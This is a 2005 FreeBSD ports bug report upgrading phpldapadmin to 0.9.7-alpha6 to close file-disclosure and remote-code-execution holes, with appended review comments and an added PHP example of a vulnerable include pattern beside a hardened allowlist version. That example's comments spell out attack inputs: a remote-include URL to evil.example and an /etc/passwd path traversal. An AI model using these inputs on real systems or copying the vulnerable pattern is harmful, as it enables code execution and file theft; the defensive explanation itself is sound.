From owner-freebsd-ports-bugs@FreeBSD.ORG Thu Sep 1 13:00:41 2005
Return-Path:
X-Original-To: freebsd-ports-bugs@hub.freebsd.org
Delivered-To: freebsd-ports-bugs@hub.freebsd.org
Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 8996016A41F for ; Thu, 1 Sep 2005 13:00:41 +0000 (GMT) (envelope-from gnats@FreeBSD.org)
Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 3E71643D46 for ; Thu, 1 Sep 2005 13:00:40 +0000 (GMT) (envelope-from gnats@FreeBSD.org)
Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.13.3/8.13.3) with ESMTP id j81D0eUm024406 for ; Thu, 1 Sep 2005 13:00:40 GMT (envelope-from gnats@freefall.freebsd.org)
Received: (from gnats@localhost) by freefall.freebsd.org (8.13.3/8.13.1/Submit) id j81D0eaE024405; Thu, 1 Sep 2005 13:00:40 GMT (envelope-from gnats)
Resent-Date: Thu, 1 Sep 2005 13:00:40 GMT
Resent-Message-Id: <200509011300.j81D0eaE024405@freefall.freebsd.org>
Resent-From: FreeBSD-gnats-submit@FreeBSD.org (GNATS Filer)
Resent-To: freebsd-ports-bugs@FreeBSD.org
Resent-Reply-To: FreeBSD-gnats-submit@FreeBSD.org, Matthew Seaman
Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id CD89C16A41F; Thu, 1 Sep 2005 12:55:25 +0000 (GMT) (envelope-from matthew@thebunker.net)
Received: from male.aldigital.co.uk (male.thebunker.net [213.129.64.13]) by mx1.FreeBSD.org (Postfix) with ESMTP id 60B1C43D48; Thu, 1 Sep 2005 12:55:25 +0000 (GMT) (envelope-from matthew@thebunker.net)
Received: from lack-of-gravitas.thebunker.net (gateway.ash.thebunker.net [213.129.64.4]) (using TLSv1 with cipher EDH-RSA-DES-CBC3-SHA (168/168 bits)) (No client certificate requested) by male.aldigital.co.uk (Postfix) with ESMTP id 4C997976EF; Thu, 1 Sep 2005 13:55:23 +0100 (BST)
Received: from lack-of-gravitas.thebunker.net (localhost [127.0.0.1]) by lack-of-gravitas.thebunker.net (8.13.4/8.13.4) with ESMTP id j81CtNVo097539; Thu, 1 Sep 2005 13:55:23 +0100 (BST) (envelope-from matthew@lack-of-gravitas.thebunker.net)
Received: (from matthew@localhost) by lack-of-gravitas.thebunker.net (8.13.4/8.13.4/Submit) id j81CtMPl097538; Thu, 1 Sep 2005 13:55:22 +0100 (BST) (envelope-from matthew)
Message-Id: <200509011255.j81CtMPl097538@lack-of-gravitas.thebunker.net>
Date: Thu, 1 Sep 2005 13:55:22 +0100 (BST)
From: Matthew Seaman
To: FreeBSD-gnats-submit@FreeBSD.org
X-Send-Pr-Version: 3.113
Cc: security-team@FreeBSD.org
Subject: ports/85567: [maintainer] net/phpldapadmin -- security update to 0.9.7-alpha6
X-BeenThere: freebsd-ports-bugs@freebsd.org
X-Mailman-Version: 2.1.5
Precedence: list
Reply-To: Matthew Seaman
List-Id: Ports bug reports
List-Unsubscribe: ,
List-Archive:
List-Post:
List-Help:
List-Subscribe: ,
X-List-Received-Date: Thu, 01 Sep 2005 13:00:41 -0000

>Number:         85567
>Category:       ports
>Synopsis:       [maintainer] net/phpldapadmin -- security update to 0.9.7-alpha6
>Confidential:   no
>Severity:       serious
>Priority:       medium
>Responsible:    freebsd-ports-bugs
>State:          open
>Quarter:
>Keywords:
>Date-Required:
>Class:          maintainer-update
>Submitter-Id:   current-users
>Arrival-Date:   Thu Sep 01 13:00:39 GMT 2005
>Closed-Date:
>Last-Modified:
>Originator:     Matthew Seaman
>Release:        FreeBSD 6.0-BETA3 i386
>Organization:
Infracaninophile
>Environment:
System: FreeBSD lack-of-gravitas.thebunker.net 6.0-BETA3 FreeBSD 6.0-BETA3 #3: Tue Aug 30 13:36:31 BST 2005 root@lack-of-gravitas.thebunker.net:/usr/obj/usr/src/sys/LACK-OF-GRAVITAS i386
>Description:
Security update to version 0.9.7-alpha6 which closes the vulnerabilities mentioned in:

http://secunia.com/advisories/16617/
http://secunia.com/advisories/16611/

(16617 in particular allows remote access to arbitrary files on the web server or uploading files from an arbitrary location and executing them in the context of the PHP interpreter in the httpd. Nasty.)
The following patches can be applied as a workaround if you don't want to upgrade from 0.9.6c just yet: http://cvs.sourceforge.net/viewcvs.py/phpldapadmin/phpldapadmin/login.php?r1=1.45&r2=1.46 http://cvs.sourceforge.net/viewcvs.py/phpldapadmin/phpldapadmin/welcome.php?r1=1.20&r2=1.21 >How-To-Repeat: >Fix: --- phpldapadmin.diff begins here --- diff -Nur /usr/ports/net/phpldapadmin/Makefile phpldapadmin/Makefile --- /usr/ports/net/phpldapadmin/Makefile Tue Jun 14 08:48:53 2005 +++ phpldapadmin/Makefile Thu Sep 1 13:22:39 2005 @@ -6,11 +6,12 @@ # PORTNAME= phpldapadmin -PORTVERSION= 0.9.6c +PORTVERSION= 0.9.7.a6 PORTEPOCH= 1 CATEGORIES= net www MASTER_SITES= ${MASTER_SITE_SOURCEFORGE} MASTER_SITE_SUBDIR= phpldapadmin +DISTNAME= ${PORTNAME}-${PORTVERSION:C/\.a(.)/-alpha\1/} MAINTAINER= m.seaman@infracaninophile.co.uk COMMENT= A set of PHP-scripts to administer LDAP servers over the web diff -Nur /usr/ports/net/phpldapadmin/distinfo phpldapadmin/distinfo --- /usr/ports/net/phpldapadmin/distinfo Tue Jun 7 09:00:11 2005 +++ phpldapadmin/distinfo Thu Sep 1 13:23:03 2005 @@ -1,2 +1,2 @@ -MD5 (phpldapadmin-0.9.6c.tar.gz) = 8404fa6f0ad3185cc9353c94bf44ae56 -SIZE (phpldapadmin-0.9.6c.tar.gz) = 707109 +MD5 (phpldapadmin-0.9.7-alpha6.tar.gz) = 08109739708f5b00c197422fb883a7b9 +SIZE (phpldapadmin-0.9.7-alpha6.tar.gz) = 739882 --- phpldapadmin.diff ends here --- >Release-Note: >Audit-Trail: >Unformatted:
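Review bot: the Makefile hunk bumps PORTVERSION from 0.9.6c to 0.9.7.a6 for a security fix, but the PR carries no ports/security/vuxml entry for the two Secunia advisories it cites, so portaudit users still on 0.9.6c get no warning; the commit should land together with a VuXML entry covering the vulnerable range. The new version string also needs checking before commit: nothing here shows that 0.9.7.a6 orders above the 0.9.6c it replaces and how it will order against the eventual 0.9.7 release, so run `pkg_version -t 0.9.6c 0.9.7.a6` (expect `<`) and `pkg_version -t 0.9.7.a6 0.9.7`, and if the second prints `>` note that the final release will need a further PORTEPOCH bump, since PORTEPOCH stays at 1 in this hunk. Finally, confirm the substitution `DISTNAME= ${PORTNAME}-${PORTVERSION:C/\.a(.)/-alpha\1/}` with `make -V DISTNAME` in the port directory, which must print `phpldapadmin-0.9.7-alpha6` to match the distinfo entry; the `(.)` capture works because any further digits are carried through unchanged, but `([0-9]+)` would state the intent more clearly for the next maintainer.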
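Review bot: the distinfo hunk replaces only an MD5 and a SIZE line for phpldapadmin-0.9.7-alpha6.tar.gz, and MD5 collisions had already been demonstrated by 2005, so the committer should not take `MD5 (phpldapadmin-0.9.7-alpha6.tar.gz) = 08109739708f5b00c197422fb883a7b9` and `SIZE (phpldapadmin-0.9.7-alpha6.tar.gz) = 739882` on trust from the PR: fetch the tarball independently from the SourceForge mirror named in MASTER_SITES (`make fetch`), run `make checksum`, and compare against whatever checksum or signature the upstream project publishes for the alpha6 release. Regenerating with `make makesum` after applying the Makefile hunk must reproduce exactly these two values; any difference means either a mismatched distfile or a wrong DISTNAME, and both have to be resolved before the security update is committed.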
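As an added illustration of the bug class the description attributes to Secunia 16617 (a PHP include target taken from the request, giving arbitrary local file disclosure or remote code execution in the interpreter), here is a vulnerable pattern beside its hardened form. This is example code written for this page, not phpldapadmin's own code: the `page` parameter, the `pages/` directory and the function names are assumptions for the illustration.

```php
<?php
// Added example, not phpldapadmin code. The "page" parameter, the pages/
// directory and the function names are assumptions for illustration only.

// VULNERABLE: the include target is built directly from request input.
// With URL includes enabled (allow_url_fopen, or allow_url_include on
// PHP 5.2+), ?page=http://evil.example/x.txt? makes the interpreter fetch
// and execute remote code; with them disabled, ?page=../../../../etc/passwd
// (plus a trailing NUL byte on PHP < 5.3.4) discloses arbitrary local files.
function render_vulnerable(array $get): void
{
    $page = isset($get['page']) ? $get['page'] : 'welcome';
    include $page . '.php';
}

// HARDENED: request values are keys into a fixed allowlist, never path
// fragments, and the resolved path is verified to lie under $base.
// Returns true when a page was included, false when the request was refused.
function render_hardened(array $get, string $base): bool
{
    $allowed = [
        'welcome' => 'welcome.php',
        'login'   => 'login.php',
    ];
    $key = isset($get['page']) ? $get['page'] : 'welcome';
    if (!isset($allowed[$key])) {
        return false;              // unknown page: refuse, do not guess
    }
    $dir  = realpath($base);
    $real = realpath($base . DIRECTORY_SEPARATOR . $allowed[$key]);
    // Defence in depth: even an allowlisted entry must resolve under $base,
    // which guards against a symlink or a later careless edit to the table.
    if ($dir === false || $real === false
        || strncmp($real, $dir . DIRECTORY_SEPARATOR, strlen($dir) + 1) !== 0) {
        return false;
    }
    include $real;
    return true;
}

// Usage sketch with constructed input (assumes a pages/ directory beside this file):
// render_hardened(['page' => 'login'], __DIR__ . '/pages');                   // includes pages/login.php
// render_hardened(['page' => 'http://evil.example/x.txt?'], __DIR__ . '/pages'); // false: not allowlisted
// render_hardened(['page' => '../../etc/passwd'], __DIR__ . '/pages');          // false: not allowlisted
```

The allowlist is the actual fix; the `realpath` check is belt-and-braces so that a mistake in the table cannot reopen the hole. The same pattern applies to any PHP page that chooses a template or include file from `$_GET`, `$_POST` or `$_COOKIE`, which is why the PR recommends upgrading rather than relying on the two upstream patches alone.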